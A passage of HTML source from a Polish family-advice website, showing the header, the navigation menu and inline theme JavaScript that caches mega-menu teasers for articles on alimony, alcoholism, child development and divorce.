        <div class="td-container td-header-row">
            <div class="td-header-sp-recs">
                <div class="td-header-rec-wrap">
    
</div>            </div>
            <div class="td-header-sp-logo">
                			<a class="td-main-logo" href="http://www.erodzina.com/">
				<img src="http://www.erodzina.com/wp-content/uploads/2016/03/logo-2.gif" alt="">
				<span class="td-visual-hidden">erodzina.com</span>
			</a>
		            </div>
        </div>
    </div>

    <div class="td-header-menu-wrap-full td-container-wrap " style="height: 55px;">
        
        <div class="td-header-menu-wrap ">
            <div class="td-container td-header-row td-header-main-menu">
                <div id="td-header-menu" role="navigation">
    <div id="td-top-mobile-toggle"><a href="#"><i class="td-icon-font td-icon-mobile"></i></a></div>
    <div class="td-main-menu-logo td-logo-in-header">
                <a class="td-main-logo" href="http://www.erodzina.com/">
            <img src="http://www.erodzina.com/wp-content/uploads/2016/03/logo-2.gif" alt="">
        </a>
        </div>
    <div class="menu-main-container"><ul id="menu-main-1" class="sf-menu sf-js-enabled"><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-first td-menu-item td-mega-menu menu-item-5108"><a href="http://www.erodzina.com/kategoria/zycie-i-rodzina/" class="sf-with-ul">Rodzina<i class="td-icon-menu-down"></i></a>
<ul class="sub-menu" style="display: none; float: none; width: 20em;">
	<li class="menu-item-0" style="white-space: normal; float: left; width: 100%;"><div class="td-container-border"><div class="td-mega-grid"><script>var block_td_uid_2_5c5e20b7819de = new tdBlock();
block_td_uid_2_5c5e20b7819de.id = "td_uid_2_5c5e20b7819de";
block_td_uid_2_5c5e20b7819de.atts = '{"limit":3,"sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"4","category_ids":"","custom_title":"","custom_url":"","show_child_cat":30,"sub_cat_ajax":"","ajax_pagination":"next_prev","header_color":"","header_text_color":"","ajax_pagination_infinite_stop":"","td_column_number":3,"td_ajax_preloading":"preload","td_ajax_filter_type":"td_category_ids_filter","td_ajax_filter_ids":"","td_filter_default_txt":"Wszystko","color_preset":"","border_top":"","class":"td_uid_2_5c5e20b7819de_rand","el_class":"","offset":"","css":"","tdc_css":"","tdc_css_class":"td_uid_2_5c5e20b7819de_rand","tdc_css_class_style":"td_uid_2_5c5e20b7819de_rand_style","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":"","block_template_id":""}';
block_td_uid_2_5c5e20b7819de.td_column_number = "3";
block_td_uid_2_5c5e20b7819de.block_type = "td_block_mega_menu";
block_td_uid_2_5c5e20b7819de.post_count = "3";
block_td_uid_2_5c5e20b7819de.found_posts = "377";
block_td_uid_2_5c5e20b7819de.header_color = "";
block_td_uid_2_5c5e20b7819de.ajax_pagination_infinite_stop = "";
block_td_uid_2_5c5e20b7819de.max_num_pages = "126";
tdBlocksArray.push(block_td_uid_2_5c5e20b7819de);
</script>            <script>
                var tmpObj = JSON.parse(JSON.stringify(block_td_uid_2_5c5e20b7819de));
                tmpObj.is_ajax_running = true;
                var currentBlockObjSignature = JSON.stringify(tmpObj);
                tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/co-wiedziec-o-alimentach\/\" rel=\"bookmark\" title=\"Co wiedzie\u0107 o alimentach?\"><img width=\"260\" height=\"177\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/b85d6bf66324cffacee01924e62d621e-260x177.png\" alt=\"\" title=\"Co wiedzie\u0107 o alimentach?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/zycie-i-rodzina\/porady-prawne\/\" class=\"td-post-category\">Porady prawne<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/co-wiedziec-o-alimentach\/\" rel=\"bookmark\" title=\"Co wiedzie\u0107 o alimentach?\">Co wiedzie\u0107 o alimentach?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2019-01-08T12:52:13+00:00\" >8 stycznia 2019<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/czym-jest-uzaleznienie-od-alkoholu-i-jak-leczyc-alkoholizm\/\" rel=\"bookmark\" title=\"Czym jest uzale\u017cnienie od alkoholu i jak leczy\u0107 alkoholizm?\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/9029da7783d1b08a3b11b63d8bde3ac1-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/9029da7783d1b08a3b11b63d8bde3ac1-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/9029da7783d1b08a3b11b63d8bde3ac1-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/9029da7783d1b08a3b11b63d8bde3ac1-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Czym jest uzale\u017cnienie od alkoholu i jak leczy\u0107 alkoholizm?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/zycie-i-rodzina\/alkoholizm\/\" class=\"td-post-category\">Alkoholizm<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/czym-jest-uzaleznienie-od-alkoholu-i-jak-leczyc-alkoholizm\/\" rel=\"bookmark\" title=\"Czym jest uzale\u017cnienie od alkoholu i jak leczy\u0107 alkoholizm?\">Czym jest uzale\u017cnienie od alkoholu i jak leczy\u0107 alkoholizm?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-10-23T16:51:35+00:00\" >23 pa\u017adziernika 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/jak-to-bylo-z-nauka-chodzenia\/\" rel=\"bookmark\" title=\"Jak to by\u0142o z nauk\u0105 chodzenia?\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/nauka_chodzenia_001-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/nauka_chodzenia_001-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/nauka_chodzenia_001-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/nauka_chodzenia_001-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Jak to by\u0142o z nauk\u0105 chodzenia?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/zycie-i-rodzina\/dziecko-porady\/\" class=\"td-post-category\">Dziecko porady<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/jak-to-bylo-z-nauka-chodzenia\/\" rel=\"bookmark\" title=\"Jak to by\u0142o z nauk\u0105 chodzenia?\">Jak to by\u0142o z nauk\u0105 chodzenia?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-10-09T13:25:50+00:00\" >9 pa\u017adziernika 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_2_5c5e20b7819de","td_hide_prev":true,"td_hide_next":false}));
                                            tmpObj = JSON.parse(JSON.stringify(block_td_uid_2_5c5e20b7819de));
                            tmpObj.is_ajax_running = true;
                            tmpObj.td_current_page = 1;
                            tmpObj.td_filter_value = 63;
                            var currentBlockObjSignature = JSON.stringify(tmpObj);
                            tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/czym-jest-uzaleznienie-od-alkoholu-i-jak-leczyc-alkoholizm\/\" rel=\"bookmark\" title=\"Czym jest uzale\u017cnienie od alkoholu i jak leczy\u0107 alkoholizm?\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/9029da7783d1b08a3b11b63d8bde3ac1-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/9029da7783d1b08a3b11b63d8bde3ac1-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/9029da7783d1b08a3b11b63d8bde3ac1-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/9029da7783d1b08a3b11b63d8bde3ac1-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Czym jest uzale\u017cnienie od alkoholu i jak leczy\u0107 alkoholizm?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/zycie-i-rodzina\/alkoholizm\/\" class=\"td-post-category\">Alkoholizm<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/czym-jest-uzaleznienie-od-alkoholu-i-jak-leczyc-alkoholizm\/\" rel=\"bookmark\" title=\"Czym jest uzale\u017cnienie od alkoholu i jak leczy\u0107 alkoholizm?\">Czym jest uzale\u017cnienie od alkoholu i jak leczy\u0107 alkoholizm?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-10-23T16:51:35+00:00\" >23 pa\u017adziernika 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/alkoholik-rodzinie-postepowac-taka-osoba\/\" rel=\"bookmark\" title=\"Alkoholik w rodzinie &#8211; jak post\u0119powa\u0107 z tak\u0105 osob\u0105?\"><img width=\"260\" height=\"184\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/05\/alkoholik-w-rodzinie.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/05\/alkoholik-w-rodzinie.jpg 800w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/05\/alkoholik-w-rodzinie-300x212.jpg 300w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/05\/alkoholik-w-rodzinie-768x542.jpg 768w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Alkoholik w rodzinie &#8211; jak post\u0119powa\u0107 z tak\u0105 osob\u0105?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/zycie-i-rodzina\/alkoholizm\/\" class=\"td-post-category\">Alkoholizm<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/alkoholik-rodzinie-postepowac-taka-osoba\/\" rel=\"bookmark\" title=\"Alkoholik w rodzinie &#8211; jak post\u0119powa\u0107 z tak\u0105 osob\u0105?\">Alkoholik w rodzinie &#8211; jak post\u0119powa\u0107 z tak\u0105 osob\u0105?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2016-05-25T17:30:02+00:00\" >25 maja 2016<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/pijanikierowcypl-na-kolach\/\" rel=\"bookmark\" title=\"pijanikierowcy.pl na ko\u0142ach\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/themes\/ionMag\/images\/no-thumb\/td_260x195.png\" alt=\"\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/zycie-i-rodzina\/alkoholizm\/\" class=\"td-post-category\">Alkoholizm<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/pijanikierowcypl-na-kolach\/\" rel=\"bookmark\" title=\"pijanikierowcy.pl na ko\u0142ach\">pijanikierowcy.pl na ko\u0142ach<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2007-08-28T12:33:45+00:00\" >28 sierpnia 2007<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_2_5c5e20b7819de","td_hide_prev":true,"td_hide_next":false}));
                                                    tmpObj = JSON.parse(JSON.stringify(block_td_uid_2_5c5e20b7819de));
                            tmpObj.is_ajax_running = true;
                            tmpObj.td_current_page = 1;
                            tmpObj.td_filter_value = 25;
                            var currentBlockObjSignature = JSON.stringify(tmpObj);
                            tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/jak-to-bylo-z-nauka-chodzenia\/\" rel=\"bookmark\" title=\"Jak to by\u0142o z nauk\u0105 chodzenia?\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/nauka_chodzenia_001-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/nauka_chodzenia_001-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/nauka_chodzenia_001-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/nauka_chodzenia_001-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Jak to by\u0142o z nauk\u0105 chodzenia?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/zycie-i-rodzina\/dziecko-porady\/\" class=\"td-post-category\">Dziecko porady<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/jak-to-bylo-z-nauka-chodzenia\/\" rel=\"bookmark\" title=\"Jak to by\u0142o z nauk\u0105 chodzenia?\">Jak to by\u0142o z nauk\u0105 chodzenia?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-10-09T13:25:50+00:00\" >9 pa\u017adziernika 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/jak-nauczyc-dziecko-pisac-kilka-cennych-rad-dla-rodzicow\/\" rel=\"bookmark\" title=\"Jak nauczy\u0107 dziecko pisa\u0107 &#8211; kilka cennych rad dla rodzic\u00f3w\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/a1bc0d0663afc7d6fd33539f887e30f7-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/a1bc0d0663afc7d6fd33539f887e30f7-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/a1bc0d0663afc7d6fd33539f887e30f7-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/a1bc0d0663afc7d6fd33539f887e30f7-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Jak nauczy\u0107 dziecko pisa\u0107 &#8211; kilka cennych rad dla rodzic\u00f3w\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/zycie-i-rodzina\/dziecko-porady\/\" class=\"td-post-category\">Dziecko porady<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/jak-nauczyc-dziecko-pisac-kilka-cennych-rad-dla-rodzicow\/\" rel=\"bookmark\" title=\"Jak nauczy\u0107 dziecko pisa\u0107 &#8211; kilka cennych rad dla rodzic\u00f3w\">Jak nauczy\u0107 dziecko pisa\u0107 &#8211; kilka cennych rad dla rodzic\u00f3w<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-09-05T15:38:57+00:00\" >5 wrze\u015bnia 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/porozmawiajmy-o-dzieciach\/\" rel=\"bookmark\" title=\"Porozmawiajmy o dzieciach\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/027f7fc55fc02bfa35120b3681d2693c-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/027f7fc55fc02bfa35120b3681d2693c-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/027f7fc55fc02bfa35120b3681d2693c-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/027f7fc55fc02bfa35120b3681d2693c-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Porozmawiajmy o dzieciach\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/zycie-i-rodzina\/dziecko-porady\/\" class=\"td-post-category\">Dziecko porady<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/porozmawiajmy-o-dzieciach\/\" rel=\"bookmark\" title=\"Porozmawiajmy o dzieciach\">Porozmawiajmy o dzieciach<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-09-05T15:32:26+00:00\" >5 wrze\u015bnia 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_2_5c5e20b7819de","td_hide_prev":true,"td_hide_next":false}));
                                                    tmpObj = JSON.parse(JSON.stringify(block_td_uid_2_5c5e20b7819de));
                            tmpObj.is_ajax_running = true;
                            tmpObj.td_current_page = 1;
                            tmpObj.td_filter_value = 67;
                            var currentBlockObjSignature = JSON.stringify(tmpObj);
                            tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/rozwody-dojdzie-ostatecznosci\/\" rel=\"bookmark\" title=\"Rozwody \u2013 kiedy dojdzie do ostateczno\u015bci\"><img width=\"260\" height=\"130\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/04\/obraz.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/04\/obraz.jpg 660w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/04\/obraz-300x150.jpg 300w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Rozwody \u2013 kiedy dojdzie do ostateczno\u015bci\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/zycie-i-rodzina\/malzenstwo\/\" class=\"td-post-category\">Ma\u0142\u017ce\u0144stwo<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/rozwody-dojdzie-ostatecznosci\/\" rel=\"bookmark\" title=\"Rozwody \u2013 kiedy dojdzie do ostateczno\u015bci\">Rozwody \u2013 kiedy dojdzie do ostateczno\u015bci<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2017-04-10T14:42:47+00:00\" >10 kwietnia 2017<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/czego-zaczac-rozwod\/\" rel=\"bookmark\" title=\"Od czego zacz\u0105\u0107 rozw\u00f3d?\"><img width=\"260\" height=\"173\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/09\/2-od-czego-zaczac-rozwod.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/09\/2-od-czego-zaczac-rozwod.jpg 1000w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/09\/2-od-czego-zaczac-rozwod-300x200.jpg 300w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/09\/2-od-czego-zaczac-rozwod-768x511.jpg 768w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/09\/2-od-czego-zaczac-rozwod-127x85.jpg 127w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/09\/2-od-czego-zaczac-rozwod-101x68.jpg 101w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Od czego zacz\u0105\u0107 rozw\u00f3d?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/zycie-i-rodzina\/malzenstwo\/\" class=\"td-post-category\">Ma\u0142\u017ce\u0144stwo<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/czego-zaczac-rozwod\/\" rel=\"bookmark\" title=\"Od czego zacz\u0105\u0107 rozw\u00f3d?\">Od czego zacz\u0105\u0107 rozw\u00f3d?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2016-09-08T14:06:31+00:00\" >8 wrze\u015bnia 2016<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/rozwod-krok-kroku\/\" rel=\"bookmark\" title=\"Rozw\u00f3d krok po kroku\"><img width=\"260\" height=\"173\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/05\/rings-of-love-1423031-1279x852.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/05\/rings-of-love-1423031-1279x852.jpg 850w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/05\/rings-of-love-1423031-1279x852-300x200.jpg 300w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/05\/rings-of-love-1423031-1279x852-768x512.jpg 768w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/05\/rings-of-love-1423031-1279x852-127x85.jpg 127w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/05\/rings-of-love-1423031-1279x852-101x68.jpg 101w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Rozw\u00f3d krok po kroku\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/zycie-i-rodzina\/malzenstwo\/\" class=\"td-post-category\">Ma\u0142\u017ce\u0144stwo<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/rozwod-krok-kroku\/\" rel=\"bookmark\" title=\"Rozw\u00f3d krok po kroku\">Rozw\u00f3d krok po kroku<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2016-05-25T17:32:46+00:00\" >25 maja 2016<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_2_5c5e20b7819de","td_hide_prev":true,"td_hide_next":false}));
                                                    tmpObj = JSON.parse(JSON.stringify(block_td_uid_2_5c5e20b7819de));
                            tmpObj.is_ajax_running = true;
                            tmpObj.td_current_page = 1;
                            tmpObj.td_filter_value = 29;
                            var currentBlockObjSignature = JSON.stringify(tmpObj);
                            tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/co-wiedziec-o-alimentach\/\" rel=\"bookmark\" title=\"Co wiedzie\u0107 o alimentach?\"><img width=\"260\" height=\"177\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/b85d6bf66324cffacee01924e62d621e-260x177.png\" alt=\"\" title=\"Co wiedzie\u0107 o alimentach?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/zycie-i-rodzina\/porady-prawne\/\" class=\"td-post-category\">Porady prawne<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/co-wiedziec-o-alimentach\/\" rel=\"bookmark\" title=\"Co wiedzie\u0107 o alimentach?\">Co wiedzie\u0107 o alimentach?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2019-01-08T12:52:13+00:00\" >8 stycznia 2019<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/czym-jest-i-kogo-dotyczy-rozwiazanie-umowy-o-prace-za-porozumieniem-stron\/\" rel=\"bookmark\" title=\"Czym jest i kogo dotyczy rozwi\u0105zanie umowy o prac\u0119 za porozumieniem stron?\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/08\/zdjecie_publikacja_5_erodzina.com_-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/08\/zdjecie_publikacja_5_erodzina.com_-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/08\/zdjecie_publikacja_5_erodzina.com_-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/08\/zdjecie_publikacja_5_erodzina.com_-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Czym jest i kogo dotyczy rozwi\u0105zanie umowy o prac\u0119 za porozumieniem stron?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/zycie-i-rodzina\/porady-prawne\/\" class=\"td-post-category\">Porady prawne<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/czym-jest-i-kogo-dotyczy-rozwiazanie-umowy-o-prace-za-porozumieniem-stron\/\" rel=\"bookmark\" title=\"Czym jest i kogo dotyczy rozwi\u0105zanie umowy o prac\u0119 za porozumieniem stron?\">Czym jest i kogo dotyczy rozwi\u0105zanie umowy o prac\u0119 za porozumieniem...<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-08-28T20:46:27+00:00\" >28 sierpnia 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a 